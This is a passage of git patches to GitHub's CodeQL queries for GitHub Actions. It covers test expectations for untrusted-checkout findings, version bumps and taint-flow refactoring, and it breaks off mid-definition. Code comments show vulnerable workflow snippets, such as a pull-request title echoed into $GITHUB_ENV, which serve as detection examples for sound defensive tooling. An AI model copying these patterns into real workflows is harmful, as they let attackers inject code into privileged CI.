.github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index e69de29bb2d1..3a001efbbe8a 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85b937653249..6a629764adc7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -301,9 +301,6 @@ edges | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | From b7aba1f081870794ddb7e3a439f9fd2906752f24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:05:58 +0200 Subject: [PATCH 570/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0be2657c99e5..91329e4f347e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.64 +version: 0.1.65 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ebdf6b364b22..1689480b56b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.64 +version: 0.1.65 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6a99845ecf46a81ae2a27d26c0ff76afb79e2994 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 10 Oct 2024 22:22:56 +0200 Subject: [PATCH 571/707] Remove old code to handle redirections to GITHUB_ENV Redirections to GITHUB_ENV are better handled now by the Bash module ---- --- .../actions/dataflow/internal/DataFlowPrivate.qll | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3226e41ba2ff..4e4f580f070c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -266,21 +266,6 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom - or - // e.g: - // - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - // - run: echo ${{ env.ISSUE_KEY }} - exists(Run run, string script, Expression expr, string line, string key, string value | - run.getScript() = script and - run.getAnScriptExpr() = expr and - line = script.splitAt("\n") and - key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and - value.indexOf(expr.getRawExpression()) > 0 and - key = astTo.getFieldName() and - expr = astFrom and - expr.getEnclosingWorkflow() = run.getEnclosingWorkflow() - ) ) ) } From 898507eb5488325c3569ecf984163bf948ba3874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:17:35 +0200 Subject: [PATCH 572/707] Update publish.yml --- .github/workflows/publish.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index bfe87d1056c4..67a428233e2a 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -13,7 +13,6 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh extension install github/gh-codeql - gh codeql set-channel "nightly" gh codeql version printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" From d4a24dfdd15d66486194380f33f1cc15af581365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:19:22 +0200 Subject: [PATCH 573/707] Refactor FlowSteps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 326 +++--------------- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 101 ++++++ .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/TaintTrackingPrivate.qll | 2 +- 4 files changed, 161 insertions(+), 274 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/TaintSteps.qll diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index f43d1bdcd878..b0d98d2e6590 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -3,120 +3,8 @@ */ private import actions -private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources -private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.OutputClobberingQuery -private import codeql.actions.security.UntrustedCheckoutQuery - -/** - * A unit class for adding additional taint steps. - * - * Extend this class to add additional taint steps that should apply to all - * taint configurations. - */ -class AdditionalTaintStep extends Unit { - /** - * Holds if the step from `node1` to `node2` should be considered a taint - * step for all configurations. - */ - abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); -} - -/** - * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. - * Where the expression is a string captured from the Run's script. - */ -bindingset[var_name, expr] -predicate envToRunExpr(string var_name, Run run, string expr) { - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - expr.matches("$(echo %") and expr.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 - ) - ) -} - -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var_name] -predicate envToArgInjSink(string var_name, Run run, string command) { - exists(string argument, string line, string regexp, int command_group, int argument_group | - run.getScript().splitAt("\n") = line and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and - envToRunExpr(var_name, run, argument) and - exists(run.getInScopeEnvVarExpr(var_name)) - ) -} - -/** - * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. - * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH - * - var_name is the name of the env var - * - run is the Run step - * - key is the name assigned in the special workflow file. - * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` - * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` - * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` - */ -bindingset[var_name] -predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string value | - ( - file = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(key, value) - or - file = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(key, value) - or - file = "GITHUB_PATH" and - run.getAWriteToGitHubPath(value) and - key = "path" - ) and - envToRunExpr(var_name, run, value) - ) -} - -/** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) or - exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) - ) - ) -} /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. @@ -132,103 +20,57 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key | - run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + exists(Run run, string var, string field | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string key, string value | - run.getAWriteToGitHubEnv(key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists( + Run run, string var, string field //string key, string value | + | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::isBashParameterExpansion(value, var_name, _, _) + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) //and ) } -predicate controlledCWD(Step artifact) { - artifact instanceof UntrustedArtifactDownloadStep or - // This shoould be: - // artifact instanceof PRHeadCheckoutStep - // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error - // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround - // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - artifact.(Uses).getCallee() = "actions/checkout" or - artifact instanceof GitMutableRefCheckout or - artifact instanceof GitSHACheckout or - artifact instanceof GhMutableRefCheckout or - artifact instanceof GhSHACheckout -} - /** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_OUTPUT" + * - run: | + * foo=$(> "$GITHUB_OUTPUT" */ -predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string key, string value | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" + * A command whose output gets assigned to an environment variable or step output. * - run: | - * foo=$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" */ -predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string key, string value, Step artifact | - controlledCWD(artifact) and - ( - // A file is read and its content is assigned to an env var - // - run: | - // foo=$(> "$GITHUB_ENV" - exists(string var_name, string file_read | - run.getAnAssignment(var_name, file_read) and - Bash::outputsPartialFileContent(run, file_read) and - envToRunExpr(var_name, run, value) and - run.getAWriteToGitHubEnv(key, value) - ) - or - // A file is read and its content is assigned to an output - // - run: echo "foo=$(> "$GITHUB_ENV" - run.getAWriteToGitHubEnv(key, value) and - Bash::outputsPartialFileContent(run, value) - ) and +predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(CommandSource source, Run run, string key, string cmd | + source.getCommand() = cmd and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() @@ -236,97 +78,39 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF } /** - * A download artifact step followed by a step that may use downloaded artifacts. - */ -predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Run run | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = run.getScriptScalar() and - artifact.getAFollowingStep() = run - ) -} - -// -/** - * A download artifact step followed by a uses step . - */ -predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Step artifact, Uses uses | - controlledCWD(artifact) and - pred.asExpr() = artifact and - succ.asExpr() = uses and - artifact.getAFollowingStep() = uses - ) -} - -/** - * A read of the _files field of the dorny/paths-filter action. - */ -predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof DornyPathsFilterSource and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName().matches("%_files") and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/changed-files action. - */ -predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof TJActionsChangedFilesSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = - [ - "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", - "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", - "all_changed_and_modified_files", "all_changed_files", "other_changed_files", - "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", - "changed_keys" - ] and - succ.asExpr() = o - ) -} - -/** - * A read of user-controlled field of the tj-actions/verify-changed-files action. + * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" */ -predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(StepsExpression o | - pred instanceof Xt0rtedSlashCommandSource and - o.getTarget() = pred.asExpr() and - o.getStepId() = pred.asExpr().(UsesStep).getId() and - o.getFieldName() = "command-arguments" and - succ.asExpr() = o +predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(FileSource source, Run run, string key, string cmd | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + Bash::outputsPartialFileContent(run, cmd) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScriptScalar() and + // we store the taint on the enclosing job since there may not be an implicit env attribute + succ.asExpr() = run.getEnclosingJob() ) } - -class TaintSteps extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - envToRunStep(node1, node2) or - artifactDownloadToRunStep(node1, node2) or - artifactDownloadToUsesStep(node1, node2) or - // 3rd party actions - dornyPathsFilterTaintStep(node1, node2) or - tjActionsChangedFilesTaintStep(node1, node2) or - tjActionsVerifyChangedFilesTaintStep(node1, node2) or - xt0rtedSlashCommandActionTaintStep(node1, node2) - } -} diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll new file mode 100644 index 000000000000..de64a0dd6f4c --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -0,0 +1,101 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +/** + * A download artifact step followed by a step that may use downloaded artifacts. + */ +predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(FileSource source, Run run | + pred = source and + source.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) +} + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsVerifyChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) + } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 4e4f580f070c..d7c3dad9ee7e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,10 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or - artifactToEnvStoreStep(node1, node2, c) + fileToOutputStoreStep(node1, node2, c) or + fileToEnvStoreStep(node1, node2, c) or + commandToOutputStoreStep(node1, node2, c) or + commandToEnvStoreStep(node1, node2, c) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index b8647339d24c..2dde52035767 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -5,7 +5,7 @@ private import DataFlowPrivate private import codeql.actions.DataFlow -private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.TaintSteps private import codeql.actions.Ast /** From d558ff80c3a63fa113a0befa2d09334c48d8e64f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:03 +0200 Subject: [PATCH 574/707] New Command sources for git and GITHUB_EVENT_PATH --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 109 +++++++++++++++++- ql/lib/ext/config/untrusted_git_commands.yml | 32 +++++ 4 files changed, 153 insertions(+), 3 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_git_commands.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e298865c468f..e3bf239565eb 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -128,3 +128,13 @@ predicate vulnerableActionsDataModel( ) { Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } + +/** + * MaD models for untrusted git commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted git commands + * - flag: Flag for the command + */ +predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index cc1b5553f5f7..a32e9c445f2d 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -57,3 +57,8 @@ extensible predicate argumentInjectionSinksDataModel( extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); + +/** + * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. + */ +extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 4682e7b1abfe..f1fb2073ed0d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -64,6 +64,88 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } } +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); +} + +class GitCommandSource extends 